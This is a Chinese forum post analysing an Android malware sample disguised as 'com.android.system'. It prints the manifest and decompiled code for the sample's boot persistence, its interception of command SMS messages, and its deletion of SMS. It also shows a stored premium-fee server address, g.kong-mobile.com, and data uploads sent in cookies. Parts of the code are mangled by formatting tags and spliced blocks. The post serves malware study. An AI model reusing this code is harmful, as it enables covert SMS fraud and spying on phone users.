|
一.基本信息 文件名称:Update.apk MD5:396ecd933e52403c645c1241de501696 Sha-1:29051ca16672b9cb2b5940cc2e0d8feeb6a51262 应用名称:Audience 文件包名:com.android.system
二.AndroidManifest.xml [Asm] 纯文本查看 复制代码 <receiver android:label="@string/app_name" android:name=".Audiencer">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<service android:name=".Audience" />//启动的服务
</application>
<uses-permission android:name="android.permission.INTERNET" />//联网
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />//访问网络状态
<uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />//改写APN设置
<uses-permission android:name="android.permission.WRITE_APN_SETTING" />
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />//访问wifi
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//开机开启广播
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />//读信息
<uses-permission android:name="android.permission.WRITE_SMS" />//写信息
<uses-permission android:name="android.permission.SEND_SMS" />//发信息
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />//监视,修改有关拨出电话
<uses-permission android:name="android.permission.WAKE_LOCK" />//手机屏幕关闭后后台进程仍然运行
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />//挂载、反挂载外部文件系统
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />//写sd卡
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
<uses-permission android:name="android.permission.READ_LOGS" />//读取系统日志
<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />//关闭后台程序
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启程序
<uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
</manifest>
三.分析 1) 安装完后,重新开机,验证其具有开机启动,启动对象为.Audiencer,伪装包名为:com.android.system
同时具有:屏幕关闭时启动服务,监控短信(收到短信)启动服务 2)BroadcastReceiver:Audiencer [Asm] 纯文本查看 复制代码 public void onReceive(Context paramContext, Intent paramIntent)
{
int i = 0;
Log.e(Audiencer.class.getSimpleName(), paramIntent.getAction());
if (this.a == null)
{
this.a = new Intent();
this.a.setClass(paramContext, Audience.class);//启动 Audience服务
}
if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))//当接受到短信时
{
Object[] arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
SmsMessage[] arrayOfSmsMessage;
if ((arrayOfObject != null) && (arrayOfObject.length > 0))
arrayOfSmsMessage = new SmsMessage[arrayOfObject.length];
for (int j = 0; ; j++)
{
if (j >= arrayOfObject.length)
{
int k = arrayOfSmsMessage.length;
if (i < k)
break;
return;
}
arrayOfSmsMessage[j] = SmsMessage.createFromPdu((byte[])arrayOfObject[j]);
}
SmsMessage localSmsMessage = arrayOfSmsMessage[i];
String str1 = localSmsMessage.getMessageBody();
String str2 = localSmsMessage.getOriginatingAddress();
if (str1.startsWith("ch:"))//监听 拦截短信内容以 “ch:”开始的短信,获得网址,写入数据库
{
Audience.e().a(str1.substring(3));
abortBroadcast();
return;
}
if (str1.startsWith("pr:"))//拦截短信内容以 “pr:” 开始的短信,记录mobile号码
{
Audience.e().b(str1.substring(3));[/size][/font][/color][font=宋体][color=#000000][size=11.818181991577148px]//记录接受到每1位mobile号,写入HashMap中,最后写入数据库[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]abortBroadcast();[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]return;[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]}[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]Audience.e().c().a("SmsReceiver mobile:" + str2 + " content:" + str1);[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]if (Audience.e().k().a(str2, str1, null))//str2为电话号码,str1为信息内容[/size][/font][/color][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]{[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]System.out.println("need response");[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px]Audience.e().k().b(str1);//str1为信息内容[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]switch (Audience.e().k().a().g())[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]{[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] case 3:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] default:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] case 0:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] case 1:[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] case 2:[/size][/color][/font][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]}[/size][/font][/color][/align][align=left][color=rgb(0, 0, 0)][font=宋体][size=11.818181991577148px]}[/size][/font][/color][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] while (true)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] i++;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] break;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] abortBroadcast();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] abortBroadcast();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] abortBroadcast();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if (!Audience.e().k().a().a(str2, str1))[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] a.a.f.a(Audience.e().k().a().a(str2), Audience.e().k().a(str1));//发送信息[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Log.e("Process", "service is:" + Audience.e());[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if (Audience.e() != null)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if ("android.intent.action.SCREEN_ON".equals(paramIntent.getAction()))//屏幕打开时[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Log.e("Receiver", "Screen_ON");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] while (true)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] try[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Audience.e().o();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] catch (Exception localException1)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] try[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if (!Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Audience.e().m();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if (Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] break;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Log.e("Process", "Start Service By Dial Or Start up");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] paramContext.startService(this.a);[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] return;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] localException1 = localException1;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] localException1.printStackTrace();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] catch (Exception localException2)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] localException2.printStackTrace();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if (!"android.intent.action.SCREEN_OFF".equals(paramIntent.getAction()))//屏幕关闭时[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Log.e("Receiver", "Screen_OFF");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if (Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] {[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] paramContext.startService(this.a);//屏幕关闭时,启动服务[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Log.e("Process", "Start Service");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Audience.e().l();[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] if (!Audience.a)[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] continue;[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] Log.e("Process", "Start Service By Dial Or Start up");[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] paramContext.startService(this.a);[/size][/color][/font][/align][align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align]
[align=left][font=宋体][color=#000000][size=11.818181991577148px] }[/size][/color][/font][/align][align=left]
[color=black][/color][/align][align=left][color=black][/color][/align][align=left][color=black][font=宋体][size=9pt] {
3)拦截信息,获取记录接受到每1位mobile号 [Asm] 纯文本查看 复制代码 public final void b(String paramString)//记录接受到每1位mobile号
{
StringBuffer localStringBuffer = new StringBuffer();
int i1 = 0;
if (i1 >= paramString.length())
{
c(localStringBuffer.toString());
return;
}
int i2 = paramString.charAt(i1);
if (i2 == 97)
localStringBuffer.append('0');
while (true)
{
i1++;
break;
if (i2 == 98)
{
localStringBuffer.append('1');
continue;
}
if (i2 == 99)
{
localStringBuffer.append('2');
continue;
}
if (i2 == 100)
{
localStringBuffer.append('3');
continue;
}
if (i2 == 101)
{
localStringBuffer.append('4');
continue;
}
if (i2 == 102)
{
localStringBuffer.append('5');
continue;
}
if (i2 == 103)[mw_shl_code=asm,true]public final void b(String paramString)//paramString为信息内容
{
Log.e("waitForSmsJob", this.c);
if (this.c != null)
{
if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
this.c.a(this.d);
}
else
return;
this.c.a(c(paramString));//j.a(c(paramString))////paramString为信息内容,//等待接收消息,对信息内容处理
}
{
localStringBuffer.append('6');
continue;
}
if (i2 == 104)
{
localStringBuffer.append('7');
continue;
}
if (i2 == 105)
{
localStringBuffer.append('8');
continue;
}
if (i2 != 106)
continue;
localStringBuffer.append('9');
}[/mw_shl_code]
3)对接收到的命令信息执行: [Asm] 纯文本查看 复制代码 public final void b(String paramString)//paramString为信息内容
{
Log.e("waitForSmsJob", this.c);
if (this.c != null)
{
if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
this.c.a(this.d);
}
else
return;
this.c.a(c(paramString));//j.a(c(paramString))////paramString为信息内容,//等待接收消息,对信息内容处理
}
4)数据库Audience.db进行信息记录 [Asm] 纯文本查看 复制代码 public final void onCreate(SQLiteDatabase paramSQLiteDatabase)
{
a("DBOpenHelper onCreate");
try
{
paramSQLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS sysapp (_id integer primary key, config varchar (2048))");
this.b.put("next_work_time", Audience.e().j());
this.b.put("next_work_time2", "86400");
Map localMap = this.b;
Random localRandom = new Random();
StringBuffer localStringBuffer1 = new StringBuffer("");
int i = 0;
ContentValues localContentValues;
StringBuffer localStringBuffer2;
Iterator localIterator;
if (i >= 18)
{
localMap.put("pid", localStringBuffer1.toString());//各种响应回复命令
this.b.put("response_to_who", "");
this.b.put("reply_response_to_who", "");
this.b.put("reply_response_to_what", "");
this.b.put("response_type", "3");
this.b.put("remain_time", "0");
this.b.put("mobile", "");
this.b.put("start_time", "0");
this.b.put("response_to_what", "");
this.b.put("change_to_who", "");
this.b.put("change_to_what", "");
this.b.put("reply_who", "");
this.b.put("reply_what", "");
this.b.put("content_cutter", "");
this.b.put("heart_beat", "0");
this.b.put("heart_beat_last_work", "0");
this.b.put("heart_beat_last_work2", "0");
this.b.put("heart_beat_start_block", "0");
this.b.put("fee_host", "post://g.kong-mobile.com:8000/g");
this.b.put("work_count", "0");
this.b.put("phs", "YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ");
localContentValues = new ContentValues();
localContentValues.put("_id", Integer.valueOf(1));
localStringBuffer2 = new StringBuffer();
localIterator = this.b.entrySet().iterator();
}
while (true)
{
if (!localIterator.hasNext())
{
localContentValues.put("config", localStringBuffer2.toString());
paramSQLiteDatabase.insert("sysapp", null, localContentValues);
a("DBOpenHelper.onCreate " + localStringBuffer2.toString());
return;
localStringBuffer1.append(localRandom.nextInt(10));
i++;
break;
}
Map.Entry localEntry = (Map.Entry)localIterator.next();
if (localStringBuffer2.length() != 0)
localStringBuffer2.append("[P]");
localStringBuffer2.append((String)localEntry.getKey()).append("[=]").append((String)localEntry.getValue());
}
}
catch (Exception localException)
{
a("DBOpenHelper.onCreate " + localException.toString());
}
}
对应数据库表sysapp记录各种操作信息: next_work_time2[=]86400[P]response_to_what[=][P]work_count[=]2[P]reply_response_to_who[=][P]heart_beat_start_block[=]0[P]reply_response_to_what[=][P]pid[=]880085661072784632[P]heart_beat[=]374[P]remain_time[=]0[P]response_to_who[=][P]next_work_time[=]180[P]heart_beat_last_work[=]374[P]fee_host[=]post://g.kong-mobile.com:8000/g[P]content_cutter[=][P]response_type[=]3[P]phs[=]YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ[P]change_to_who[=][P]reply_what[=][P]reply_who[=][P]change_to_what[=][P]heart_beat_last_work2[=]0[P]start_time[=]0[P]mobile[=]
5)模块a/a/f有对信息的 修改,删除操作等: paramContentResolver.delete(Uri.parse("content://sms"), " _id = " + paramInt, null); paramContentResolver.update(Uri.parse("content://sms"), localContentValues, " _id = " + paramInt, null); 6)a/b/b模块具有联网,以cookies形式上传信息 操作 setRequestProperty("Cookie", localStringBuffer.toString());
简单分析,大牛勿喷  |
发表于 2014-4-20 08:40
